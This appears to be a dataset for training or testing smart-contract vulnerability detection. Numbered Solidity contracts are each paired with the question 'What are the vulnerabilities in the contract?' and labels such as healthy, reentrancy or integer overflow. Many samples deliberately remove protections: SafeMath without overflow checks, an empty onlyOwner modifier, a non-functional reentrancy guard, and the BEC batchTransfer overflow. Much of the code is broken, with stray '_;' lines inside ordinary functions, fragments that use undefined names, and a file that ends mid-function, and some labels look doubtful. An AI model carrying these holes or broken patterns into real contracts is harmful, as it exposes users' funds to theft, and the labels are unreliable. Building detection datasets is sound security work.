tot_bug.txt

1 pragma solidity >=0.4.24 <0.6.0;

2 contract ExternalFunctionCall {

3     function foo(uint x) public returns (uint ret) {
4         ret = x + 2;
5     }

6     function testExternalFunctionCall(uint x) public {
7         uint y = this.foo(x);        
8     }

9 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 contract B {
3    function funcB() public pure returns (uint) {
4        return 42;
5    }
6    constructor() public {}
7 }

8 contract A {
9    function funcA1() public pure returns (uint) {
10        return 11;
11    }
12    function funcA2(uint x) public pure returns (uint) {
13        return x+1;
14    }
15    function funcA3() public returns (B) {
16        B retVal= new B();
17        return retVal;
18    }
19    constructor() public
20     {
              
21     }
22 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test passes, but assertion on line 35 is only proved
3 // up to 4 transactions
4 // This result means that ctor A is only called once, for B, as A(x+1)
5 // Compare this test with ConstructorChaining2_fail.sol: no ctor args there,
6 // so the workaround in the compiler doesn't work, and the base ctor is called twice 


7 // Example of the trace:
8 // D(x) is called, where x is 716
9 // B(x+3) called, where x is 716, B's arg is 719
10 // A(x+1) called, where x is 720. A's arg is 720
11 // ctor A {a = x} , where a is 720
12 // ctor B  {b = x+1 } , where x is 719, b is 720
13 // C(x+4) is called, where x is 716, C's arg is 720
14 // ctor C   { c = x + 2}, where x is 720, c is 722

15 contract A {
16     uint a;
17     constructor (uint x) public {
18         a = x;
19     }
20 }

21 contract B is A {
22     uint b;
23     constructor (uint x) A(x+1) public {  
24         b = x + 1;             
25     }
26 }

27 contract C is A {
28     uint c;
29     //constructor (uint x) A(x+2) public {          // no A with ANY args here, otherwise, solc error:
30                                                                                                         // "Base constr args given twice"
31         constructor (uint x) public {
32         c = x + 2;                       
33     }
34 }

35 contract D is B, C {
36     constructor (uint x) B(x+3) C(x+4) public
37     {        
38     }
39 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 contract B {
3    function funcB() public pure returns (uint) {
4        return 42;
5    }
6    constructor() public {}
7 }

8 contract A {
9    function funcA1() public pure returns (uint) {
10        return 11;
11    }
12    function funcA2(uint x) public pure returns (uint) {
13        return x+1;
14    }
15    function funcA3() public returns (B) {
16        B retVal= new B();
17        return retVal;
18    }
19    constructor() public
20     {
21     }
22 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test passes, but assertion on line 35 is only proved
3 // up to 4 transactions
4 // This result means that ctor A is only called once, for B, as A(x+1)
5 // Compare this test with ConstructorChaining2_fail.sol: no ctor args there,
6 // so the workaround in the compiler doesn't work, and the base ctor is called twice 


7 // Example of the trace:
8 // D(x) is called, where x is 716
9 // B(x+3) called, where x is 716, B's arg is 719
10 // A(x+1) called, where x is 720. A's arg is 720
11 // ctor A {a = x} , where a is 720
12 // ctor B  {b = x+1 } , where x is 719, b is 720
13 // C(x+4) is called, where x is 716, C's arg is 720
14 // ctor C   { c = x + 2}, where x is 720, c is 722

15 contract A {
16     uint a;
17     constructor (uint x) public {
18         a = x;
19     }
20 }

21 contract B is A {
22     uint b;
23     constructor (uint x) A(x+1) public {  
24         b = x + 1;
25     }
26 }

27 contract C is A {
28     uint c;
29     //constructor (uint x) A(x+2) public {          // no A with ANY args here, otherwise, solc error:
30                                                                                                         // "Base constr args given twice"
31         constructor (uint x) public {
32         c = x + 2;
33       // passes, but proved to only 4 transactions        
34     }
35 }

36 contract D is B, C {
37     constructor (uint x) B(x+3) C(x+4) public
38     {        
39        ;    
40     }
41 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24<0.6.0;
2 import "./Libraries/VeriSolContracts.sol";


3 contract LoopFor {

4     int x;
5     int y;

6     function ContractInvariant () private view {
    
7     }

8     // test Loop invariant with for loop
9     constructor(int n) public {
10         require (n >= 0);
11         x = n;
12         y = x;
13     }

14     function Foo() public {
15         if ( x > 0 ) 
16         {
17            x--;
18            y--;
19         }      
20     } 
21 }
What are the vulnerabilities in the contract?
healthy
<end of text>
pragma solidity >=0.4.24 <0.6.0;

//simple library with no internal state

library Lib {
    function add(uint _a, uint _b) public view returns (uint r) {
        address x = address(this);       
        r = _a + _b;
    }
}

contract C {
    // using Lib for uint;

    function foo() public {
        uint x = 1;
        uint y = 2;
        uint z = Lib.add(x, y);        
    }
}
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.4.24;
2 import "./../../Libraries/VeriSolContracts.sol";
3 //import "./VeriSolContracts.sol";
4 //import "github.com/microsoft/verisol/blob/master/Libraries/VeriSolContracts.sol";

5 contract LoopFor {

6     // test Loop invariant with for loop
7     constructor(uint n) public {
8         require (n >= 0);
9         uint y = 0;
10         for (uint x = n; x != 0; x --) {         
11             y++;
12         }
      
13     }

14     // test Loop invariant with while loop
15     function Foo(uint n) public {
16         require (n >= 0);
17         uint y = 0;
18         uint x = n;
19         while (x != 0) {          
20             y++;
21             x--;
22         }     
23     }

24     // test Loop invariant with do-while loop    
25     function Bar(uint n) public {
26         require (n > 0);
27         uint y = 0;
28         uint x = n;
29         do {          
30             y++;
31             x--;
32         } while (x != 0);       
33     }
34 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.5.0;

2 import "./IERC20.sol";
3 import "./SafeMath.sol";
4 import "./Libraries/VeriSolContracts.sol"; //change 


5 /**
6  * A highly simplified Token to express basic specifications
7  * 
8  * - totalSupply() equals the Sum({balanceOf(a) | a is an address })
9  * 
10  */
11 contract ERC20 is IERC20 {

12     mapping (address => uint256) private _balances;
13     uint256 private _totalSupply;


14     /**
15      * A dummy constructor
16      */
17     constructor (uint256 totalSupply) public {       
18        _totalSupply = totalSupply;
19        _balances[msg.sender] = totalSupply;
20     }

21     /**
22      * @dev See {IERC20-totalSupply}.
23      */
24     function totalSupply() public view returns (uint256) {
25         return _totalSupply;
26     }

27     /**
28      * @dev See {IERC20-balanceOf}.
29      */
30     function balanceOf(address account) public view returns (uint256) {
31         return _balances[account];
32     }

33     /**
34      * @dev See {IERC20-transfer}.
35      *
36      * Requirements:
37      *
38      * - `recipient` cannot be the zero address.
39      * - the caller must have a balance of at least `amount`.
40      */
41     function transfer(address recipient, uint256 amount) public returns (bool) {
42         uint oldBalanceSender = _balances[msg.sender];

43         _transfer(msg.sender, recipient, amount); 

44         //assert (/* msg.sender == recipient ||  */ _balances[msg.sender] == oldBalanceSender - amount);
45         // the following assertion will fail due to overflow when not using safemath
46         //   to detect it,  run with /modularArith flag
47         //   to prove it, run ERC20 with /modularArith flag       
48         return true;
49     }

50     /**
51      * @dev Moves tokens `amount` from `sender` to `recipient`.
52      *
53      * This is internal function is equivalent to {transfer}, and can be used to
54      * e.g. implement automatic token fees, slashing mechanisms, etc.
55      *
56      * Emits a {Transfer} event.
57      *
58      * Requirements:
59      *
60      * - `sender` cannot be the zero address.
61      * - `recipient` cannot be the zero address.
62      * - `sender` must have a balance of at least `amount`.
63      */
64     function _transfer(address sender, address recipient, uint256 amount) internal {
65         require(sender != address(0), "ERC20: transfer from the zero address");
66         require(recipient != address(0), "ERC20: transfer to the zero address");      
67         _balances[sender] = SafeMath.sub(_balances[sender], amount);
                        
68                 _balances[recipient] = _balances[recipient] + amount; // nosafemath //_balances[recipient] = _balances[recipient].add(amount);
69     }
70 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
business logic flaw
integer overflow/underflow
<end of text>
1 //SPDX-License-Identifier: MIT
2 pragma solidity 0.7.5;

3 contract contrived{
4  function withdraw(uint256 amount) override public nonReentrant updateReward(msg.sender) {  
5     _totalSupply = _totalSupply - amount;
6     _balances[msg.sender] = _balances[msg.sender].sub(amount);
7     stakingToken.safeTransfer(msg.sender, amount);

8     emit Withdrawn(msg.sender, amount);
9   }
10 }
What are the vulnerabilities in the contract?
integer over/underflow
<end of text>
1 /**
2  *Submitted for verification at Etherscan.io on 2018-02-09
3 */

4 pragma solidity ^0.4.16;

5 /**
6  * @title SafeMath
7  * @dev Math operations with safety checks that throw on error
8  */
9 library SafeMath {
10   function mul(uint256 a, uint256 b) internal constant returns (uint256) {
11     uint256 c = a * b;
12     return c;
13   }

14   function div(uint256 a, uint256 b) internal constant returns (uint256) {
15     // assert(b > 0); // Solidity automatically throws when dividing by 0
16     uint256 c = a / b;
17     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
18     return c;
19   }

20   function sub(uint256 a, uint256 b) internal constant returns (uint256) {    
21     return a - b;
22   }

23   function add(uint256 a, uint256 b) internal constant returns (uint256) {
24     uint256 c = a + b;    
25     return c;
26   }
27 }

28 /**
29  * @title ERC20Basic
30  * @dev Simpler version of ERC20 interface
31  * @dev see https://github.com/ethereum/EIPs/issues/179
32  */
33 contract ERC20Basic {
34   uint256 public totalSupply;
35   function balanceOf(address who) public constant returns (uint256);
36   function transfer(address to, uint256 value) public returns (bool);
37   event Transfer(address indexed from, address indexed to, uint256 value);
38 }

39 /**
40  * @title Basic token
41  * @dev Basic version of StandardToken, with no allowances.
42  */
43 contract BasicToken is ERC20Basic {
44   using SafeMath for uint256;

45   mapping(address => uint256) balances;

46   /**
47   * @dev transfer token for a specified address
48   * @param _to The address to transfer to.
49   * @param _value The amount to be transferred.
50   */
51   function transfer(address _to, uint256 _value) public returns (bool) {  

52     // SafeMath.sub will throw if there is not enough balance.
53     balances[msg.sender] = balances[msg.sender].sub(_value);
54     balances[_to] = balances[_to].add(_value);
55     Transfer(msg.sender, _to, _value);
56     return true;
57   }

58   /**
59   * @dev Gets the balance of the specified address.
60   * @param _owner The address to query the the balance of.
61   * @return An uint256 representing the amount owned by the passed address.
62   */
63   function balanceOf(address _owner) public constant returns (uint256 balance) {
64     return balances[_owner];
65   }
66 }

67 /**
68  * @title ERC20 interface
69  * @dev see https://github.com/ethereum/EIPs/issues/20
70  */
71 contract ERC20 is ERC20Basic {
72   function allowance(address owner, address spender) public constant returns (uint256);
73   function transferFrom(address from, address to, uint256 value) public returns (bool);
74   function approve(address spender, uint256 value) public returns (bool);
75   event Approval(address indexed owner, address indexed spender, uint256 value);
76 }


77 /**
78  * @title Standard ERC20 token
79  *
80  * @dev Implementation of the basic standard token.
81  * @dev https://github.com/ethereum/EIPs/issues/20
82  * @dev Based on code by FirstBlood: https://github.com/Firstbloodio/token/blob/master/smart_contract/FirstBloodToken.sol
83  */
84 contract StandardToken is ERC20, BasicToken {

85   mapping (address => mapping (address => uint256)) internal allowed;


86   /**
87    * @dev Transfer tokens from one address to another
88    * @param _from address The address which you want to send tokens from
89    * @param _to address The address which you want to transfer to
90    * @param _value uint256 the amount of tokens to be transferred
91    */
92   function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
93     require(_to != address(0));
94     require(_value > 0 && _value <= balances[_from]);
95     require(_value <= allowed[_from][msg.sender]);

96     balances[_from] = balances[_from].sub(_value);
97     balances[_to] = balances[_to].add(_value);
98     allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
99     Transfer(_from, _to, _value);
100     return true;
101   }

102   /**
103    * @dev Approve the passed address to spend the specified amount of tokens on behalf of msg.sender.
104    *
105    * Beware that changing an allowance with this method brings the risk that someone may use both the old
106    * and the new allowance by unfortunate transaction ordering. One possible solution to mitigate this
107    * race condition is to first reduce the spender's allowance to 0 and set the desired value afterwards:
108    * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
109    * @param _spender The address which will spend the funds.
110    * @param _value The amount of tokens to be spent.
111    */
112   function approve(address _spender, uint256 _value) public returns (bool) {
113     allowed[msg.sender][_spender] = _value;
114     Approval(msg.sender, _spender, _value);
115     return true;
116   }

117   /**
118    * @dev Function to check the amount of tokens that an owner allowed to a spender.
119    * @param _owner address The address which owns the funds.
120    * @param _spender address The address which will spend the funds.
121    * @return A uint256 specifying the amount of tokens still available for the spender.
122    */
123   function allowance(address _owner, address _spender) public constant returns (uint256 remaining) {
124     return allowed[_owner][_spender];
125   }
126 }

127 /**
128  * @title Ownable
129  * @dev The Ownable contract has an owner address, and provides basic authorization control
130  * functions, this simplifies the implementation of "user permissions".
131  */
132 contract Ownable {
133   address public owner;


134   event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);


135   /**
136    * @dev The Ownable constructor sets the original `owner` of the contract to the sender
137    * account.
138    */
139   function Ownable() {
140     owner = msg.sender;
141   }


142   /**
143    * @dev Throws if called by any account other than the owner.
144    */
145   modifier onlyOwner() {   
146     _;
147   }


148   /**
149    * @dev Allows the current owner to transfer control of the contract to a newOwner.
150    * @param newOwner The address to transfer ownership to.
151    */
152   function transferOwnership(address newOwner) onlyOwner public {  
153     OwnershipTransferred(owner, newOwner);
154     owner = newOwner;
155   }

156 }

157 /**
158  * @title Pausable
159  * @dev Base contract which allows children to implement an emergency stop mechanism.
160  */
161 contract Pausable is Ownable {
162   event Pause();
163   event Unpause();

164   bool public paused = false;


165   /**
166    * @dev Modifier to make a function callable only when the contract is not paused.
167    */
168   modifier whenNotPaused() {   
169     _;
170   }

171   /**
172    * @dev Modifier to make a function callable only when the contract is paused.
173    */
174   modifier whenPaused() {   
175     _;
176   }

177   /**
178    * @dev called by the owner to pause, triggers stopped state
179    */
180   function pause() onlyOwner whenNotPaused public {
181     paused = true;
182     Pause();
183   }

184   /**
185    * @dev called by the owner to unpause, returns to normal state
186    */
187   function unpause() onlyOwner whenPaused public {
188     paused = false;
189     Unpause();
190   }
191 }

192 /**
193  * @title Pausable token
194  *
195  * @dev StandardToken modified with pausable transfers.
196  **/

197 contract PausableToken is StandardToken, Pausable {

198   function transfer(address _to, uint256 _value) public whenNotPaused returns (bool) {
199     return super.transfer(_to, _value);
200   }

201   function transferFrom(address _from, address _to, uint256 _value) public whenNotPaused returns (bool) {
202     return super.transferFrom(_from, _to, _value);
203   }

204   function approve(address _spender, uint256 _value) public whenNotPaused returns (bool) {
205     return super.approve(_spender, _value);
206   }
  
207   function batchTransfer(address[] _receivers, uint256 _value) public whenNotPaused returns (bool) {
208     uint cnt = _receivers.length;
209     uint256 amount = uint256(cnt) * _value;
210     require(cnt > 0 && cnt <= 20);
211     require(_value > 0 && balances[msg.sender] >= amount);

212     balances[msg.sender] = balances[msg.sender].sub(amount);
213     for (uint i = 0; i < cnt; i++) {
214         balances[_receivers[i]] = balances[_receivers[i]].add(_value);
215         Transfer(msg.sender, _receivers[i], _value);
216     }
217     return true;
218   }
219 }

220 /**
221  * @title Bec Token
222  *
223  * @dev Implementation of Bec Token based on the basic standard token.
224  */
225 contract BecToken is PausableToken {
226     /**
227     * Public variables of the token
228     * The following variables are OPTIONAL vanities. One does not have to include them.
229     * They allow one to customise the token contract & in no way influences the core functionality.
230     * Some wallets/interfaces might not even bother to look at this information.
231     */
232     string public name = "BeautyChain";
233     string public symbol = "BEC";
234     string public version = '1.0.0';
235     uint8 public decimals = 18;

236     /**
237      * @dev Function to check the amount of tokens that an owner allowed to a spender.
238      */
239     function BecToken() {
240       totalSupply = 7000000000 * (10**(uint256(decimals)));
241       balances[msg.sender] = totalSupply;    // Give the creator all initial tokens
242     }

243     function () {
244         //if ether is sent to this address, send it back.
245         revert();
246     }
247 }
What are the vulnerabilities in the contract?
integer over/underflow
atomicity violation
incorrect visibility/ownership
<end of text>
1 /**
2  *Submitted for verification at Etherscan.io on 2020-10-07
3 */

4 // File: openzeppelin-solidity-2.3.0/contracts/ownership/Ownable.sol

5 pragma solidity ^0.5.0;

6 contract Bank{


7 //reentrant here 
8     function work(uint256 id, address goblin, uint256 loan, uint256 maxReturn, bytes calldata data)
9         external payable
10         onlyEOA accrue(msg.value)
11     {
12         // 1. Sanity check the input position, or add a new position of ID is 0.
13         if (id == 0) {
14             id = nextPositionID++;
15             positions[id].goblin = goblin;
16             positions[id].owner = msg.sender;
17         } else {
18            _;
19         }
20         emit Work(id, loan);
21         // 2. Make sure the goblin can accept more debt and remove the existing debt.      
22         uint256 debt = _removeDebt(id).add(loan);
23         // 3. Perform the actual work, using a new scope to avoid stack-too-deep errors.
24         uint256 back;
25         {
26             uint256 sendETH = msg.value.add(loan);
27             require(sendETH <= address(this).balance, "insufficient ETH in the bank");
28             uint256 beforeETH = address(this).balance.sub(sendETH);
29             Goblin(goblin).work.value(sendETH)(id, msg.sender, debt, data);
30             back = address(this).balance.sub(beforeETH);
31         }
32         // 4. Check and update position debt.
33         uint256 lessDebt = Math.min(debt, Math.min(back, maxReturn));
34         debt = debt.sub(lessDebt);
35         if (debt > 0) {           
36             uint256 health = Goblin(goblin).health(id);
37             uint256 workFactor = config.workFactor(goblin, debt);          
38             _addDebt(id, debt);
39         }
40         // 5. Return excess ETH back.
41         if (back > lessDebt) SafeToken.safeTransferETH(msg.sender, back - lessDebt);
42     }
43 }

What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 /**
2  *Submitted for verification at BscScan.com on 2021-07-30
3 */

4 //SPDX-License-Identifier: MIT
5 pragma solidity ^0.8.0;


6 abstract contract ReentrancyGuard {
7         uint256 private constant _NOT_ENTERED = 1;
8         uint256 private constant _ENTERED = 2;
9         uint256 private _status;
10         constructor () {
11             _status = _NOT_ENTERED;
12         }
    
13         modifier nonReentrant() {           
14             _status = _ENTERED;
15             _;
16             _status = _NOT_ENTERED;
17         }
18     }


19 contract surgeToken{
  
20   /** Sells SURGE Tokens And Deposits the BNB into Seller's Address */
21     function sell(uint256 tokenAmount) public nonReentrant returns (bool) {
        
22         address seller = msg.sender;
        
23         // make sure seller has this balance
24         require(_balances[seller] >= tokenAmount, 'cannot sell above token amount');
        
25         // calculate the sell fee from this transaction
26         uint256 tokensToSwap = tokenAmount.mul(sellFee).div(10**2);
        
27         // how much BNB are these tokens worth?
28         uint256 amountBNB = tokensToSwap.mul(calculatePrice());
        
29         //reentrant happens here: during call fallback, the attacker invoked purchase multiple times
30         (bool successful,) = payable(seller).call{value: amountBNB, gas: 40000}(""); 
31         if (successful) {
32             // subtract full amount from sender
33             _balances[seller] = _balances[seller].sub(tokenAmount, 'sender does not have this amount to sell');
34             // if successful, remove tokens from supply
35             _totalSupply = _totalSupply.sub(tokenAmount);
36         } else {
37             revert();
38         }
39         emit Transfer(seller, address(this), tokenAmount);
40         return true;
41     }

    
42     function purchase(address buyer, uint256 bnbAmount) internal returns (bool) {
43         // make sure we don't buy more than the bnb in this contract
44                 // previous amount of BNB before we received any        
45         uint256 prevBNBAmount = (address(this).balance).sub(bnbAmount);
46         // if this is the first purchase, use current balance
47         prevBNBAmount = prevBNBAmount == 0 ? address(this).balance : prevBNBAmount;
48         // find the number of tokens we should mint to keep up with the current price
49         uint256 nShouldPurchase = hyperInflatePrice ? _totalSupply.mul(bnbAmount).div(address(this).balance) : _totalSupply.mul(bnbAmount).div(prevBNBAmount);
50         // apply our spread to tokens to inflate price relative to total supply
51         uint256 tokensToSend = nShouldPurchase.mul(spreadDivisor).div(10**2);
52         // revert if under 1
53         if (tokensToSend < 1) {
54             revert('Must Buy More Than One Surge');
55         }
56     }

57 }
What are the vulnerabilities in the contract?
reentrancy
business logic flaw
<end of text>
1 /**
2  *Submitted for verification at BscScan.com on 2021-07-30
3 */

4 //SPDX-License-Identifier: MIT
5 pragma solidity ^0.8.0;


6 /**
7  *Submitted for verification at FtmScan.com on 2021-08-31
8 */

9 // SPDX-License-Identifier: MIT
10 // File: @openzeppelin/contracts/GSN/Context.sol

11 pragma solidity ^0.5.0;

12 /*
13  * @dev Provides information about the current execution context, including the
14  * sender of the transaction and its data. While these are generally available
15  * via msg.sender and msg.data, they should not be accessed in such a direct
16  * manner, since when dealing with GSN meta-transactions the account sending and
17  * paying for execution may not be the actual sender (as far as an application
18  * is concerned).
19  *
20  * This contract is only required for intermediate, library-like contracts.
21  */
22 abstract contract Context {
23     function _msgSender() internal view virtual returns (address payable) {
24         return msg.sender;
25     }

26     function _msgData() internal view virtual returns (bytes memory) {
27         this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
28         return msg.data;
29     }
30 }

31 // File: @openzeppelin/contracts/token/ERC20/IERC20.sol


32 /**
33  * @dev Interface of the ERC20 standard as defined in the EIP.
34  */
35 interface IERC20 {
36     /**
37      * @dev Returns the amount of tokens in existence.
38      */
39     function totalSupply() external view returns (uint256);

40     /**
41      * @dev Returns the amount of tokens owned by `account`.
42      */
43     function balanceOf(address account) external view returns (uint256);

44     /**
45      * @dev Moves `amount` tokens from the caller's account to `recipient`.
46      *
47      * Returns a boolean value indicating whether the operation succeeded.
48      *
49      * Emits a {Transfer} event.
50      */
51     function transfer(address recipient, uint256 amount) external returns (bool);

52     /**
53      * @dev Returns the remaining number of tokens that `spender` will be
54      * allowed to spend on behalf of `owner` through {transferFrom}. This is
55      * zero by default.
56      *
57      * This value changes when {approve} or {transferFrom} are called.
58      */
59     function allowance(address owner, address spender) external view returns (uint256);

60     /**
61      * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
62      *
63      * Returns a boolean value indicating whether the operation succeeded.
64      *
65      * IMPORTANT: Beware that changing an allowance with this method brings the risk
66      * that someone may use both the old and the new allowance by unfortunate
67      * transaction ordering. One possible solution to mitigate this race
68      * condition is to first reduce the spender's allowance to 0 and set the
69      * desired value afterwards:
70      * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
71      *
72      * Emits an {Approval} event.
73      */
74     function approve(address spender, uint256 amount) external returns (bool);

75     /**
76      * @dev Moves `amount` tokens from `sender` to `recipient` using the
77      * allowance mechanism. `amount` is then deducted from the caller's
78      * allowance.
79      *
80      * Returns a boolean value indicating whether the operation succeeded.
81      *
82      * Emits a {Transfer} event.
83      */
84     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

85     /**
86      * @dev Emitted when `value` tokens are moved from one account (`from`) to
87      * another (`to`).
88      *
89      * Note that `value` may be zero.
90      */
91     event Transfer(address indexed from, address indexed to, uint256 value);

92     /**
93      * @dev Emitted when the allowance of a `spender` for an `owner` is set by
94      * a call to {approve}. `value` is the new allowance.
95      */
96     event Approval(address indexed owner, address indexed spender, uint256 value);
97 }

98 // File: @openzeppelin/contracts/math/SafeMath.sol



99 /**
100  * @dev Wrappers over Solidity's arithmetic operations with added overflow
101  * checks.
102  *
103  * Arithmetic operations in Solidity wrap on overflow. This can easily result
104  * in bugs, because programmers usually assume that an overflow raises an
105  * error, which is the standard behavior in high level programming languages.
106  * `SafeMath` restores this intuition by reverting the transaction when an
107  * operation overflows.
108  *
109  * Using this library instead of the unchecked operations eliminates an entire
110  * class of bugs, so it's recommended to use it always.
111  */
112 library SafeMath {
113     /**
114      * @dev Returns the addition of two unsigned integers, reverting on
115      * overflow.
116      *
117      * Counterpart to Solidity's `+` operator.
118      *
119      * Requirements:
120      *
121      * - Addition cannot overflow.
122      */
123     function add(uint256 a, uint256 b) internal pure returns (uint256) {
124         uint256 c = a + b;      
125         return c;
126     }

127     /**
128      * @dev Returns the subtraction of two unsigned integers, reverting on
129      * overflow (when the result is negative).
130      *
131      * Counterpart to Solidity's `-` operator.
132      *
133      * Requirements:
134      *
135      * - Subtraction cannot overflow.
136      */
137     function sub(uint256 a, uint256 b) internal pure returns (uint256) {
138        _;
139     }

140     /**
141      * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
142      * overflow (when the result is negative).
143      *
144      * Counterpart to Solidity's `-` operator.
145      *
146      * Requirements:
147      *
148      * - Subtraction cannot overflow.
149      */
150     function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {     
151         uint256 c = a - b;

152         return c;
153     }

154     /**
155      * @dev Returns the multiplication of two unsigned integers, reverting on
156      * overflow.
157      *
158      * Counterpart to Solidity's `*` operator.
159      *
160      * Requirements:
161      *
162      * - Multiplication cannot overflow.
163      */
164     function mul(uint256 a, uint256 b) internal pure returns (uint256) {
165         // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
166         // benefit is lost if 'b' is also tested.
167         // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
168         if (a == 0) {
169             return 0;
170         }

171         uint256 c = a * b;      
172         return c;
173     }

174     /**
175      * @dev Returns the integer division of two unsigned integers. Reverts on
176      * division by zero. The result is rounded towards zero.
177      *
178      * Counterpart to Solidity's `/` operator. Note: this function uses a
179      * `revert` opcode (which leaves remaining gas untouched) while Solidity
180      * uses an invalid opcode to revert (consuming all remaining gas).
181      *
182      * Requirements:
183      *
184      * - The divisor cannot be zero.
185      */
186     function div(uint256 a, uint256 b) internal pure returns (uint256) {
187         _;
188     }

189     /**
190      * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
191      * division by zero. The result is rounded towards zero.
192      *
193      * Counterpart to Solidity's `/` operator. Note: this function uses a
194      * `revert` opcode (which leaves remaining gas untouched) while Solidity
195      * uses an invalid opcode to revert (consuming all remaining gas).
196      *
197      * Requirements:
198      *
199      * - The divisor cannot be zero.
200      */
201     function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {        
202         uint256 c = a / b;
203         // assert(a == b * c + a % b); // There is no case in which this doesn't hold

204         return c;
205     }

206     /**
207      * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
208      * Reverts when dividing by zero.
209      *
210      * Counterpart to Solidity's `%` operator. This function uses a `revert`
211      * opcode (which leaves remaining gas untouched) while Solidity uses an
212      * invalid opcode to revert (consuming all remaining gas).
213      *
214      * Requirements:
215      *
216      * - The divisor cannot be zero.
217      */
218     function mod(uint256 a, uint256 b) internal pure returns (uint256) {
219         _;
220     }

221     /**
222      * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
223      * Reverts with custom message when dividing by zero.
224      *
225      * Counterpart to Solidity's `%` operator. This function uses a `revert`
226      * opcode (which leaves remaining gas untouched) while Solidity uses an
227      * invalid opcode to revert (consuming all remaining gas).
228      *
229      * Requirements:
230      *
231      * - The divisor cannot be zero.
232      */
233     function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {       
234         return a % b;
235     }
236 }

237 // File: @openzeppelin/contracts/utils/Address.sol


238 /**
239  * @dev Collection of functions related to the address type
240  */
241 library Address {
242     /**
243      * @dev Returns true if `account` is a contract.
244      *
245      * [IMPORTANT]
246      * ====
247      * It is unsafe to assume that an address for which this function returns
248      * false is an externally-owned account (EOA) and not a contract.
249      *
250      * Among others, `isContract` will return false for the following
251      * types of addresses:
252      *
253      *  - an externally-owned account
254      *  - a contract in construction
255      *  - an address where a contract will be created
256      *  - an address where a contract lived, but was destroyed
257      * ====
258      */
259     function isContract(address account) internal view returns (bool) {
260         // This method relies in extcodesize, which returns 0 for contracts in
261         // construction, since the code is only stored at the end of the
262         // constructor execution.

263         uint256 size;
264         // solhint-disable-next-line no-inline-assembly
265         assembly { size := extcodesize(account) }
266         return size > 0;
267     }

268     /**
269      * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
270      * `recipient`, forwarding all available gas and reverting on errors.
271      *
272      * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
273      * of certain opcodes, possibly making contracts go over the 2300 gas limit
274      * imposed by `transfer`, making them unable to receive funds via
275      * `transfer`. {sendValue} removes this limitation.
276      *
277      * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
278      *
279      * IMPORTANT: because control is transferred to `recipient`, care must be
280      * taken to not create reentrancy vulnerabilities. Consider using
281      * {ReentrancyGuard} or the
282      * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
283      */
284     function sendValue(address payable recipient, uint256 amount) internal {       

285         // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
286         (bool success, ) = recipient.call{ value: amount }("");
287     }

288     /**
289      * @dev Performs a Solidity function call using a low level `call`. A
290      * plain`call` is an unsafe replacement for a function call: use this
291      * function instead.
292      *
293      * If `target` reverts with a revert reason, it is bubbled up by this
294      * function (like regular Solidity function calls).
295      *
296      * Returns the raw returned data. To convert to the expected return value,
297      * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
298      *
299      * Requirements:
300      *
301      * - `target` must be a contract.
302      * - calling `target` with `data` must not revert.
303      *
304      * _Available since v3.1._
305      */
306     function functionCall(address target, bytes memory data) internal returns (bytes memory) {
307       return functionCall(target, data, "Address: low-level call failed");
308     }

309     /**
310      * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
311      * `errorMessage` as a fallback revert reason when `target` reverts.
312      *
313      * _Available since v3.1._
314      */
315     function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
316         return _functionCallWithValue(target, data, 0, errorMessage);
317     }

318     /**
319      * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
320      * but also transferring `value` wei to `target`.
321      *
322      * Requirements:
323      *
324      * - the calling contract must have an ETH balance of at least `value`.
325      * - the called Solidity function must be `payable`.
326      *
327      * _Available since v3.1._
328      */
329     function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
330         return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
331     }

332     /**
333      * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
334      * with `errorMessage` as a fallback revert reason when `target` reverts.
335      *
336      * _Available since v3.1._
337      */
338     function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {       
339         return _functionCallWithValue(target, data, value, errorMessage);
340     }

341     function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {        

342         // solhint-disable-next-line avoid-low-level-calls
